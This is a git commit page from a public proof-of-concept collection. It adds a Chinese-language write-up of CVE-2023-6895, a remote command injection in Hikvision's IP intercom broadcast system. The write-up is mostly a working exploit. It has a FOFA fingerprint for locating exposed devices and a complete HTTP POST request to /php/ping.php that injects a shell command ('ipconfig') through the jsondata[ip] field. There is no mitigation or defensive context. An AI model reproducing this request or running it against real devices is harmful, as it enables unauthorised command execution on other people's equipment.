admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create 海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行.md

Browse Source
This commit is contained in:
wy876 2023-12-23 18:22:05 +08:00 committed by GitHub
parent 742b150817
commit e72500f1e7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行.md Normal file
View File

@ -0,0 +1,27 @@
## 海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行
海康威视对讲广播系统3.0.3_20201113_RELEASE(HIK)存在漏洞。它已被宣布为关键。该漏洞影响文件/php/ping.php 的未知代码。使用输入 netstat -ano 操作参数 jsondata[ip] 会导致 os 命令注入。
## fofa
```
icon_hash="-1830859634"
```
## poc
```
POST /php/ping.php HTTP/1.1
Host: xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 45
Origin: http://xxx.xxx.xxx
Connection: close
Referer: http://xxx.xxx.xxx/html/system.html
X-Forwarded-For: 127.0.0.1
jsondata[type]=3&jsondata[ip]=ipconfig
```
![0a7e02e1600a63bf856d6581f918b036](https://github.com/wy876/POC/assets/139549762/7f52597a-bcb4-402e-89fe-c0682cb61d40)